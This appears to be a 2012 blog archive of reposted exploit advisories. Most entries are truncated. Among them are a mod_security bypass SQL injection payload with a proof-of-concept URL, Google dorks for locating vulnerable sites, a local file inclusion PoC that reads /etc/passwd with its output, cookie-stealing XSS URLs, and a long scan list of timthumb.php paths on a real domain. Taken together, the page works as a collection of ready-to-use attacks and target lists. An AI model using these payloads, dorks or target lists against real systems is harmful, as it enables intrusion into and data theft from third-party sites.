# Exploit Title: mod_security 2.6.5 SQL injection bypass.
# Date: 21/04/2012
# Author: Phizo
# Software Link: http://www.modsecurity.org/
# Version: 2.6.5
# Tested on: Windows 7 & Ubuntu 10.04
—————————————————————-
/** Although I am using union-based injection the concept of the bypass is the same **/
[+] Bypass: +/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/#
[+] PoC: http://victim/page.php?id=12+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# [...]
Archive for the ‘Bugs’ Category
Division by zero page.php SQL Injection
April 16th, 2012
Danis
# Exploit Title: Division by zero page.php SQL Injection
# Date: 16-April-2012
# Author: Xr0b0t
# Software Link:
# Version: -
# Category: [Webapps]
# Google dork: Division by zero
# Tested on: Windows 7
# Demo site: http://create-boutique.co.uk/index.php?page=4
[ bug ] code php :
<?php
session_start();
include_once('includes/db.inc.php');
include_once('includes/functions.inc.php');
include_once('includes/global.inc.php');
$db = new db();
$mainpages [...]
joomla component (com_ponygallery) SQL injection Vulnerability
April 16th, 2012
Danis
##################################################
# Exploit Title: joomla component (com_ponygallery) SQL injection Vulnerability
# Download : http://www.adyawinsa.com/index.php/remository?func=fileinfo&id=2
# Date: 11/04/2012
# Author: xDarkSton3x
# E-mail : xdarkston3x@msn.com
# Category: webapps
# Google dork: inurl:"com_ponygallery"
##################################################
[~] Exploit/p0c : http://www.site.com/index.php?option=com_ponygallery&Itemid=[sqli]
Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng ] - [ Malandrines Team - DiosdelaRed - RemoteExecution ] [...]
FlexCMS 3.2.1 Multiple CSRF Vulnerabilities
March 17th, 2012
Danis
# Exploit Title   : FlexCMS 3.2.1 Multiple CSRF
# Date            : 16-03-2012
# Author          : Ivano Binetti (http://www.ivanobinetti.com)
# Software link   : http://www.flexcms3.com/index.php/index.html
# Vendor site     : http://www.flexcms.com
# Version         : 3.2.1 (and lower)
# Tested on       : Debian Squeeze (6.0)
# Original Advisory: http://ivanobinetti.blogspot.com/2012/03/flexcms-multiple-csrf-vulnerabilities.html
Summary
1) Introduction
2) Vulnerabilities Description
3) Exploit
3.1 Exploit (Change Settings of [...]
Persistent XSS in FLEXCMS 3.2.1
March 17th, 2012
Danis
#Software vendor: http://www.flexcms.com/flex/index.html
The persistent XSS appears when any user goes to >> edit profile >> Display name >> and injects the XSS code instead of his display name. After injecting this code, the main page of the website shows a "Users Online" menu. This menu is by default in every page of [...]
OneFileCMS v.1.1.5 Local File Inclusion Vulnerability
March 17th, 2012
Danis
# Exploit Title: OneFileCMS v.1.1.5 Local File Inclusion Vulnerability
# Google Dork: -
# Date: 16/03/2012
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Software Link: https://github.com/rocktronica/OneFileCMS
# Version: OneFileCMS v.1.1.5
# Tested on: Linux Fedora 14
===============
Description
===============
OneFileCMS is just that. It's a flat, light, one file CMS (Content Management [...]
Sockso <= 1.5 Directory Traversal
March 17th, 2012
Danis
#######################################################################
Luigi Auriemma
Application:  Sockso
              http://sockso.pu-gh.com
Versions:     <= 1.5
Platforms:    Windows, Mac, Linux
Bug:          directory traversal
Exploitation: remote
Date:         14 Mar 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From author's homepage: "Sockso is a free, open-source, personal music host [...]
EDinteractive – SQL Injection Vulnerability
March 15th, 2012
admin 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /’ \ __ /’__`\ /\ \__ /’__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /’ _ `\ \/\ \/_/_\_<_ /’___\ \ \/\ \ \ \ \/\`’__\ 0 0 \ \ \/\ \/\ \ \ \ [...]
Aloservicos – SQL Injection Vulnerability
March 15th, 2012
admin 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /’ \ __ /’__`\ /\ \__ /’__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /’ _ `\ \/\ \/_/_\_<_ /’___\ \ \/\ \ \ \ \/\`’__\ 0 0 \ \ \/\ \/\ \ \ \ [...]
asaanCart XSS/LFI Vulnerabilities
March 15th, 2012
admin
______________________________________________________________________________________
# Exploit Title  : [asaanCart XSS/LFI Vulnerabilities]
# Google Dork    : [intext:"smarty_ajax — AJAX-enabled Smarty plugins"] Or [inurl:"/smarty_ajax/"]
# Date           : [14/03/2012]
# Author         : [Number 7] ~ Twitter: [@TunisianSeven] ~ Blog: [http://tunisianseven.blogspot.com/]
# Tested on      : [Linux]
# Software Link  : [http://asaancart.wordpress.com/]
# Download2      : [http://sourceforge.net/projects/asaancart/]
# Version        : [v-0.9]
______________________________________________________________________________________
The bug is based on the smarty_ajax plugin, which is included in this script and [...]
TVersity <= 1.9.7 Arbitrary File Download
March 15th, 2012
admin
#######################################################################
Luigi Auriemma
Application:  TVersity
              http://tversity.com
Versions:     <= 1.9.7
Platforms:    Windows
Bug:          arbitrary files downloading
Exploitation: remote
Date:         14 Mar 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
TVersity is a home media server.
#######################################################################
======
2) Bug
======
Possibility [...]
Zend Server 5.6.0 Multiple Remote Script Insertion Vulnerabilities
March 14th, 2012
admin
<!--
Title: Zend Server 5.6.0 Multiple Remote Script Insertion Vulnerabilities
Vendor: Zend Technologies Ltd.
Product web page: http://www.zend.com
Affected version: Zend Server 5.6.0
                  *Zend Optimizer+ 4.1
                  *Zend Code Tracing 1.0
                  *Zend Data Cache 4.0
                  *Zend Job Queue 4.0
                  *Zend Debugger 5.3
                  *Zend Java Bridge 3.1
Summary: Zend Server is a complete, enterprise-ready Web Application Server [...]
Saman Portal Local File Inclusion Vulnerability
March 14th, 2012
admin
===========================================================
[+] Title: [Iranian] Saman portal LFI
[+] Date: 2/28/12
[+] Author: TMT
[+] Mail: taktaz_m2800[a.t]yahoo.com
[+] Type: PHP
[+] Vendor or Software Link: http://www.sis-eg.com
[+] Customers: http://sis-eg.com/services/customers/
[+] Google dork: inurl:sismodule=user
============================================================
[~] desc: Vuln in modules/sisRapid/pnuserapi.php on line 117: only "../" is filtered to prevent LFI, but "....//" will work
[~] poc: http://www.site.com/index.php?module=cdk&func=loadmodule&system=cdk&sismodule=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
root:x:0:0:root:/root:/bin/bash [...]
MaXe/WordPress TimThumb 1.32 Code Execution
January 23rd, 2012
admin
# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
# Date: 3rd August 2011
# Author: MaXe
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.32
# Screenshot: See attachment
# Tested on: Windows XP + Apache + PHP (XAMPP)
WordPress TimThumb (Theme) Plugin - Remote Code Execution
Versions [...]
MustLive/Joomla Themes Cross Site Scripting / Denial Of Service
January 23rd, 2012
admin
Theme PBV MULTI VirtueMart Theme for component VirtueMart for Joomla:
Full path disclosure (WASC-13):
http://site/components/com_virtuemart/themes/pbv_multi/scripts/timthumb.php?src=http://
XSS (WASC-08):
http://site/components/com_registration/script/timthumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E
Vulnerable to XSS, Full path disclosure, Abuse of Functionality and DoS.
Component Handy Photo Album for Joomla:
XSS (WASC-08):
http://site/components/com_hpalbum/timthumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E
Vulnerable to XSS, Full path disclosure, Abuse of Functionality and DoS.
for vulnerabilities in several themes for [...]
TimThumb.php Vulnerability Scans
December 3rd, 2011
admin
http://ihir.com/wp-content/themes/TheStyle/timthumb.php
http://ihir.com/wp-content/themes/nool/timthumb.php
http://ihir.com/wp-content/themes/PersonalPress/timthumb.php
http://ihir.com/wp-content/themes/SimplePress/timthumb.php
http://ihir.com/wp-content/themes/DeepFocus/timthumb.php
http://ihir.com/wp-content/themes/DelicateNews/timthumb.php
http://ihir.com/wp-content/themes/Bold/timthumb.php
http://ihir.com/wp-content/themes/eStore/timthumb.php
http://ihir.com/wp-content/themes/TheProfessional/timthumb.php
http://ihir.com/wp-content/themes/OnTheGo/timthumb.php
http://ihir.com/wp-content/themes/AskIt/timthumb.php
http://ihir.com/wp-content/themes/Nova/timthumb.php
http://ihir.com/wp-content/themes/eNews/timthumb.php
http://ihir.com/wp-content/themes/eVid/timthumb.php
http://ihir.com/wp-content/themes/TheCorporation/timthumb.php
http://ihir.com/wp-content/themes/Minimal/timthumb.php
http://ihir.com/wp-content/themes/Polished/timthumb.php
http://ihir.com/wp-content/themes/MyResume/timthumb.php
http://ihir.com/wp-content/themes/TheSource/timthumb.php
http://ihir.com/wp-content/themes/StudioBlue/timthumb.php
http://ihir.com/wp-content/themes/Wooden/timthumb.php
http://ihir.com/wp-content/themes/WhosWho/timthumb.php
http://ihir.com/wp-content/themes/Quadro/timthumb.php
http://ihir.com/wp-content/themes/Glow/timthumb.php
http://ihir.com/wp-content/themes/Modest/timthumb.php
http://ihir.com/wp-content/themes/Aggregate/timthumb.php
http://ihir.com/wp-content/themes/ArtSee/timthumb.php
http://ihir.com/wp-content/themes/versatile/timthumb.php
http://ihir.com/wp-content/themes/omni-shop/timthumb.php
http://ihir.com/wp-content/themes/manifesto/scripts/timthumb.php
http://ihir.com/wp-content/themes/arthem-mod/scripts/timthumb.php
http://ihir.com/wp-content/themes/echoes/timthumb.php
http://ihir.com/wp-content/themes/Bold4/timthumb.php
http://ihir.com/wp-content/themes/primely-theme/scripts/timthumb.php
http://ihir.com/wp-content/themes/zenkoreviewRD/scripts/timthumb.php
http://ihir.com/wp-content/themes/ElegantEstate/timthumb.php
http://ihir.com/wp-content/themes/PersonalPress2/timthumb.php
http://ihir.com/wp-content/themes/mypage/scripts/timthumb.php
http://ihir.com/wp-content/themes/magazinum/scripts/timthumb.php
http://ihir.com/wp-content/themes/pbv_multi/scripts/timthumb.php
http://ihir.com/wp-content/themes/photofeature/scripts/timthumb.php
http://ihir.com/wp-content/themes/ColdStone/timthumb.php
http://ihir.com/wp-content/themes/HMDeepFocus/timthumb.php
http://ihir.com/wp-content/themes/EarthlyTouch/timthumb.php
http://ihir.com/wp-content/themes/Boutique/timthumb.php
http://ihir.com/wp-content/themes/ePhoto/timthumb.php
http://ihir.com/wp-content/themes/PureType/timthumb.php
http://ihir.com/wp-content/themes/13Floor/timthumb.php
http://ihir.com/wp-content/themes/BusinessCard/timthumb.php
http://ihir.com/wp-content/themes/CherryTruffle/timthumb.php
http://ihir.com/wp-content/themes/Cion/timthumb.php
http://ihir.com/wp-content/themes/DailyNotes/timthumb.php
http://ihir.com/wp-content/themes/eGallery/timthumb.php
http://ihir.com/wp-content/themes/eGamer/timthumb.php
http://ihir.com/wp-content/themes/GrungeMag/timthumb.php [...]


